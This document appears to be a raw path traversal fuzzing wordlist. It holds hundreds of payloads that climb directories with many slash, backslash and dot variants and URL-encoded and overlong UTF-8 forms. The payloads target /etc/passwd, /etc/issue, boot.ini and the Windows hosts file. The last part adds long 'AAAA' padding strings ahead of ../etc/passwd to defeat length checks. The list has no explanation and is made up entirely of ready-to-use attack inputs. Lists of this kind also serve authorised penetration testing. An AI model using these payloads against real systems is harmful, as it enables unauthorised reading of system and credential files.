-../\/../\/../\/../\/../\/etc/\/issue -../\/../\/../\/../\/../\/boot.ini -../\/../\/../\/../\/../\/windows/\/system32/\/drivers/\/etc/\/hosts -../\/../\/../\/../\/../\/../\/etc/\/passwd -../\/../\/../\/../\/../\/../\/etc/\/issue -../\/../\/../\/../\/../\/../\/boot.ini -../\/../\/../\/../\/../\/../\/windows/\/system32/\/drivers/\/etc/\/hosts -..\/\etc\/\passwd -..\/\etc\/\issue -..\/\boot.ini -..\/\windows\/\system32\/\drivers\/\etc\/\hosts -..\/\..\/\etc\/\passwd -..\/\..\/\etc\/\issue -..\/\..\/\boot.ini -..\/\..\/\windows\/\system32\/\drivers\/\etc\/\hosts -..\/\..\/\..\/\etc\/\passwd -..\/\..\/\..\/\etc\/\issue -..\/\..\/\..\/\boot.ini -..\/\..\/\..\/\windows\/\system32\/\drivers\/\etc\/\hosts -..\/\..\/\..\/\..\/\etc\/\passwd -..\/\..\/\..\/\..\/\etc\/\issue -..\/\..\/\..\/\..\/\boot.ini -..\/\..\/\..\/\..\/\windows\/\system32\/\drivers\/\etc\/\hosts -..\/\..\/\..\/\..\/\..\/\etc\/\passwd -..\/\..\/\..\/\..\/\..\/\etc\/\issue -..\/\..\/\..\/\..\/\..\/\boot.ini -..\/\..\/\..\/\..\/\..\/\windows\/\system32\/\drivers\/\etc\/\hosts -..\/\..\/\..\/\..\/\..\/\..\/\etc\/\passwd -..\/\..\/\..\/\..\/\..\/\..\/\etc\/\issue -..\/\..\/\..\/\..\/\..\/\..\/\boot.ini -..\/\..\/\..\/\..\/\..\/\..\/\windows\/\system32\/\drivers\/\etc\/\hosts -\../etc\passwd -\../etc\issue -\../boot.ini -\../windows\system32\drivers\etc\hosts -\../\../etc/\passwd -\../\../etc/\issue -\../\../boot.ini -\../\../windows/\system32/\drivers/\etc/\hosts -\../\../\../etc/\passwd -\../\../\../etc/\issue -\../\../\../boot.ini -\../\../\../windows/\system32/\drivers/\etc/\hosts -\../\../\../\../etc/\passwd -\../\../\../\../etc/\issue -\../\../\../\../boot.ini -\../\../\../\../windows/\system32/\drivers/\etc/\hosts -\../\../\../\../\../etc/\passwd -\../\../\../\../\../etc/\issue -\../\../\../\../\../boot.ini -\../\../\../\../\../windows/\system32/\drivers/\etc/\hosts -\../\../\../\../\../\../etc/\passwd -\../\../\../\../\../\../etc/\issue -\../\../\../\../\../\../boot.ini -\../\../\../\../\../\../windows/\system32/\drivers/\etc/\hosts -/..\etc\passwd -/..\etc\issue -/..\boot.ini -/..\windows\system32\drivers\etc\hosts -/..\/..\etc\/passwd -/..\/..\etc\/issue -/..\/..\boot.ini -/..\/..\windows\/system32\/drivers\/etc\/hosts -/..\/..\/..\etc\/passwd -/..\/..\/..\etc\/issue -/..\/..\/..\boot.ini -/..\/..\/..\windows\/system32\/drivers\/etc\/hosts -/..\/..\/..\/..\etc\/passwd -/..\/..\/..\/..\etc\/issue -/..\/..\/..\/..\boot.ini -/..\/..\/..\/..\windows\/system32\/drivers\/etc\/hosts -/..\/..\/..\/..\/..\etc\/passwd -/..\/..\/..\/..\/..\etc\/issue -/..\/..\/..\/..\/..\boot.ini -/..\/..\/..\/..\/..\windows\/system32\/drivers\/etc\/hosts -/..\/..\/..\/..\/..\/..\etc\/passwd -/..\/..\/..\/..\/..\/..\etc\/issue -/..\/..\/..\/..\/..\/..\boot.ini -/..\/..\/..\/..\/..\/..\windows\/system32\/drivers\/etc\/hosts -.../etc/passwd -.../etc/issue -.../boot.ini -.../windows/system32/drivers/etc/hosts -.../.../etc/passwd -.../.../etc/issue -.../.../boot.ini -.../.../windows/system32/drivers/etc/hosts -.../.../.../etc/passwd -.../.../.../etc/issue -.../.../.../boot.ini -.../.../.../windows/system32/drivers/etc/hosts -.../.../.../.../etc/passwd -.../.../.../.../etc/issue -.../.../.../.../boot.ini -.../.../.../.../windows/system32/drivers/etc/hosts -.../.../.../.../.../etc/passwd -.../.../.../.../.../etc/issue -.../.../.../.../.../boot.ini -.../.../.../.../.../windows/system32/drivers/etc/hosts -.../.../.../.../.../.../etc/passwd -.../.../.../.../.../.../etc/issue -.../.../.../.../.../.../boot.ini -.../.../.../.../.../.../windows/system32/drivers/etc/hosts -...\etc\passwd -...\etc\issue -...\boot.ini -...\windows\system32\drivers\etc\hosts -...\...\etc\passwd -...\...\etc\issue -...\...\boot.ini -...\...\windows\system32\drivers\etc\hosts -...\...\...\etc\passwd -...\...\...\etc\issue -...\...\...\boot.ini -...\...\...\windows\system32\drivers\etc\hosts -...\...\...\...\etc\passwd -...\...\...\...\etc\issue -...\...\...\...\boot.ini -...\...\...\...\windows\system32\drivers\etc\hosts -...\...\...\...\...\etc\passwd -...\...\...\...\...\etc\issue -...\...\...\...\...\boot.ini -...\...\...\...\...\windows\system32\drivers\etc\hosts -...\...\...\...\...\...\etc\passwd -...\...\...\...\...\...\etc\issue -...\...\...\...\...\...\boot.ini -...\...\...\...\...\...\windows\system32\drivers\etc\hosts -./../etc/passwd -./../etc/issue -./../boot.ini -./../windows/system32/drivers/etc/hosts -./.././../etc/passwd -./.././../etc/issue -./.././../boot.ini -./.././../windows/system32/drivers/etc/hosts -./.././.././../etc/passwd -./.././.././../etc/issue -./.././.././../boot.ini -./.././.././../windows/system32/drivers/etc/hosts -./.././.././.././../etc/passwd -./.././.././.././../etc/issue -./.././.././.././../boot.ini -./.././.././.././../windows/system32/drivers/etc/hosts -./.././.././.././.././../etc/passwd -./.././.././.././.././../etc/issue -./.././.././.././.././../boot.ini -./.././.././.././.././../windows/system32/drivers/etc/hosts -./.././.././.././.././.././../etc/passwd -./.././.././.././.././.././../etc/issue -./.././.././.././.././.././../boot.ini -./.././.././.././.././.././../windows/system32/drivers/etc/hosts -.\..\etc\passwd -.\..\etc\issue -.\..\boot.ini -.\..\windows\system32\drivers\etc\hosts -.\..\.\..\etc\passwd -.\..\.\..\etc\issue -.\..\.\..\boot.ini -.\..\.\..\windows\system32\drivers\etc\hosts -.\..\.\..\.\..\etc\passwd -.\..\.\..\.\..\etc\issue -.\..\.\..\.\..\boot.ini -.\..\.\..\.\..\windows\system32\drivers\etc\hosts -.\..\.\..\.\..\.\..\etc\passwd -.\..\.\..\.\..\.\..\etc\issue -.\..\.\..\.\..\.\..\boot.ini -.\..\.\..\.\..\.\..\windows\system32\drivers\etc\hosts -.\..\.\..\.\..\.\..\.\..\etc\passwd -.\..\.\..\.\..\.\..\.\..\etc\issue -.\..\.\..\.\..\.\..\.\..\boot.ini -.\..\.\..\.\..\.\..\.\..\windows\system32\drivers\etc\hosts -.\..\.\..\.\..\.\..\.\..\.\..\etc\passwd -.\..\.\..\.\..\.\..\.\..\.\..\etc\issue -.\..\.\..\.\..\.\..\.\..\.\..\boot.ini -.\..\.\..\.\..\.\..\.\..\.\..\windows\system32\drivers\etc\hosts -.//..//etc//passwd -.//..//etc//issue -.//..//boot.ini -.//..//windows//system32//drivers//etc//hosts -.//..//.//..//etc//passwd -.//..//.//..//etc//issue -.//..//.//..//boot.ini -.//..//.//..//windows//system32//drivers//etc//hosts -.//..//.//..//.//..//etc//passwd -.//..//.//..//.//..//etc//issue -.//..//.//..//.//..//boot.ini -.//..//.//..//.//..//windows//system32//drivers//etc//hosts -.//..//.//..//.//..//.//..//etc//passwd -.//..//.//..//.//..//.//..//etc//issue -.//..//.//..//.//..//.//..//boot.ini -.//..//.//..//.//..//.//..//windows//system32//drivers//etc//hosts -.//..//.//..//.//..//.//..//.//..//etc//passwd -.//..//.//..//.//..//.//..//.//..//etc//issue -.//..//.//..//.//..//.//..//.//..//boot.ini -.//..//.//..//.//..//.//..//.//..//windows//system32//drivers//etc//hosts -.//..//.//..//.//..//.//..//.//..//.//..//etc//passwd -.//..//.//..//.//..//.//..//.//..//.//..//etc//issue -.//..//.//..//.//..//.//..//.//..//.//..//boot.ini -.//..//.//..//.//..//.//..//.//..//.//..//windows//system32//drivers//etc//hosts -.\\..\\etc\\passwd -.\\..\\etc\\issue -.\\..\\boot.ini -.\\..\\windows\\system32\\drivers\\etc\\hosts -.\\..\\.\\..\\etc\\passwd -.\\..\\.\\..\\etc\\issue -.\\..\\.\\..\\boot.ini -.\\..\\.\\..\\windows\\system32\\drivers\\etc\\hosts -.\\..\\.\\..\\.\\..\\etc\\passwd -.\\..\\.\\..\\.\\..\\etc\\issue -.\\..\\.\\..\\.\\..\\boot.ini -.\\..\\.\\..\\.\\..\\windows\\system32\\drivers\\etc\\hosts -.\\..\\.\\..\\.\\..\\.\\..\\etc\\passwd -.\\..\\.\\..\\.\\..\\.\\..\\etc\\issue -.\\..\\.\\..\\.\\..\\.\\..\\boot.ini -.\\..\\.\\..\\.\\..\\.\\..\\windows\\system32\\drivers\\etc\\hosts -.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\etc\\passwd -.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\etc\\issue -.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\boot.ini -.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\windows\\system32\\drivers\\etc\\hosts -.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\etc\\passwd -.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\etc\\issue -.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\boot.ini -.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\windows\\system32\\drivers\\etc\\hosts -......///etc///passwd -......///etc///issue -......///boot.ini -......///windows///system32///drivers///etc///hosts -......///......///etc///passwd -......///......///etc///issue -......///......///boot.ini -......///......///windows///system32///drivers///etc///hosts -......///......///......///etc///passwd -......///......///......///etc///issue -......///......///......///boot.ini -......///......///......///windows///system32///drivers///etc///hosts -......///......///......///......///etc///passwd -......///......///......///......///etc///issue -......///......///......///......///boot.ini -......///......///......///......///windows///system32///drivers///etc///hosts -......///......///......///......///......///etc///passwd -......///......///......///......///......///etc///issue -......///......///......///......///......///boot.ini -......///......///......///......///......///windows///system32///drivers///etc///hosts -......///......///......///......///......///......///etc///passwd -......///......///......///......///......///......///etc///issue -......///......///......///......///......///......///boot.ini -......///......///......///......///......///......///windows///system32///drivers///etc///hosts -%2e%c0%ae%5cetc%5cpasswd -%2e%c0%ae%5cetc%5cissue -%2e%c0%ae%5cboot.ini -%2e%c0%ae%5cwindows%5csystem32%5cdrivers%5cetc%5chosts -%2e%c0%ae%5c%2e%c0%ae%5cetc%5cpasswd -%2e%c0%ae%5c%2e%c0%ae%5cetc%5cissue -%2e%c0%ae%5c%2e%c0%ae%5cboot.ini -%2e%c0%ae%5c%2e%c0%ae%5cwindows%5csystem32%5cdrivers%5cetc%5chosts -%2e%c0%ae%5c%2e%c0%ae%5c%2e%c0%ae%5cetc%5cpasswd -%2e%c0%ae%5c%2e%c0%ae%5c%2e%c0%ae%5cetc%5cissue -%2e%c0%ae%5c%2e%c0%ae%5c%2e%c0%ae%5cboot.ini -%2e%c0%ae%5c%2e%c0%ae%5c%2e%c0%ae%5cwindows%5csystem32%5cdrivers%5cetc%5chosts -%2e%c0%ae%5c%2e%c0%ae%5c%2e%c0%ae%5c%2e%c0%ae%5cetc%5cpasswd -%2e%c0%ae%5c%2e%c0%ae%5c%2e%c0%ae%5c%2e%c0%ae%5cetc%5cissue -%2e%c0%ae%5c%2e%c0%ae%5c%2e%c0%ae%5c%2e%c0%ae%5cboot.ini -%2e%c0%ae%5c%2e%c0%ae%5c%2e%c0%ae%5c%2e%c0%ae%5cwindows%5csystem32%5cdrivers%5cetc%5chosts -%2e%c0%ae%5c%2e%c0%ae%5c%2e%c0%ae%5c%2e%c0%ae%5c%2e%c0%ae%5cetc%5cpasswd -%2e%c0%ae%5c%2e%c0%ae%5c%2e%c0%ae%5c%2e%c0%ae%5c%2e%c0%ae%5cetc%5cissue -%2e%c0%ae%5c%2e%c0%ae%5c%2e%c0%ae%5c%2e%c0%ae%5c%2e%c0%ae%5cboot.ini -%2e%c0%ae%5c%2e%c0%ae%5c%2e%c0%ae%5c%2e%c0%ae%5c%2e%c0%ae%5cwindows%5csystem32%5cdrivers%5cetc%5chosts -%2e%c0%ae%5c%2e%c0%ae%5c%2e%c0%ae%5c%2e%c0%ae%5c%2e%c0%ae%5c%2e%c0%ae%5cetc%5cpasswd -%2e%c0%ae%5c%2e%c0%ae%5c%2e%c0%ae%5c%2e%c0%ae%5c%2e%c0%ae%5c%2e%c0%ae%5cetc%5cissue -%2e%c0%ae%5c%2e%c0%ae%5c%2e%c0%ae%5c%2e%c0%ae%5c%2e%c0%ae%5c%2e%c0%ae%5cboot.ini -%2e%c0%ae%5c%2e%c0%ae%5c%2e%c0%ae%5c%2e%c0%ae%5c%2e%c0%ae%5c%2e%c0%ae%5cwindows%5csystem32%5cdrivers%5cetc%5chosts -%2e%c0%ae%2fetc%2fpasswd -%2e%c0%ae%2fetc%2fissue -%2e%c0%ae%2fboot.ini -%2e%c0%ae%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts -%2e%c0%ae%2f%2e%c0%ae%2fetc%2fpasswd -%2e%c0%ae%2f%2e%c0%ae%2fetc%2fissue -%2e%c0%ae%2f%2e%c0%ae%2fboot.ini -%2e%c0%ae%2f%2e%c0%ae%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts -%2e%c0%ae%2f%2e%c0%ae%2f%2e%c0%ae%2fetc%2fpasswd -%2e%c0%ae%2f%2e%c0%ae%2f%2e%c0%ae%2fetc%2fissue -%2e%c0%ae%2f%2e%c0%ae%2f%2e%c0%ae%2fboot.ini -%2e%c0%ae%2f%2e%c0%ae%2f%2e%c0%ae%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts -%2e%c0%ae%2f%2e%c0%ae%2f%2e%c0%ae%2f%2e%c0%ae%2fetc%2fpasswd -%2e%c0%ae%2f%2e%c0%ae%2f%2e%c0%ae%2f%2e%c0%ae%2fetc%2fissue -%2e%c0%ae%2f%2e%c0%ae%2f%2e%c0%ae%2f%2e%c0%ae%2fboot.ini -%2e%c0%ae%2f%2e%c0%ae%2f%2e%c0%ae%2f%2e%c0%ae%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts -%2e%c0%ae%2f%2e%c0%ae%2f%2e%c0%ae%2f%2e%c0%ae%2f%2e%c0%ae%2fetc%2fpasswd -%2e%c0%ae%2f%2e%c0%ae%2f%2e%c0%ae%2f%2e%c0%ae%2f%2e%c0%ae%2fetc%2fissue -%2e%c0%ae%2f%2e%c0%ae%2f%2e%c0%ae%2f%2e%c0%ae%2f%2e%c0%ae%2fboot.ini -%2e%c0%ae%2f%2e%c0%ae%2f%2e%c0%ae%2f%2e%c0%ae%2f%2e%c0%ae%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts -%2e%c0%ae%2f%2e%c0%ae%2f%2e%c0%ae%2f%2e%c0%ae%2f%2e%c0%ae%2f%2e%c0%ae%2fetc%2fpasswd -%2e%c0%ae%2f%2e%c0%ae%2f%2e%c0%ae%2f%2e%c0%ae%2f%2e%c0%ae%2f%2e%c0%ae%2fetc%2fissue -%2e%c0%ae%2f%2e%c0%ae%2f%2e%c0%ae%2f%2e%c0%ae%2f%2e%c0%ae%2f%2e%c0%ae%2fboot.ini -%2e%c0%ae%2f%2e%c0%ae%2f%2e%c0%ae%2f%2e%c0%ae%2f%2e%c0%ae%2f%2e%c0%ae%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA../etc/passwd -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA../etc/issue -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA../boot.ini -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA../windows/system32/drivers/etc/hosts -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA../../etc/passwd -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA../../etc/issue -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA../../boot.ini -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA../../windows/system32/drivers/etc/hosts -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA../../../etc/passwd -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA../../../etc/issue -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA../../../boot.ini -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA../../../windows/system32/drivers/etc/hosts -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA../../../../etc/passwd 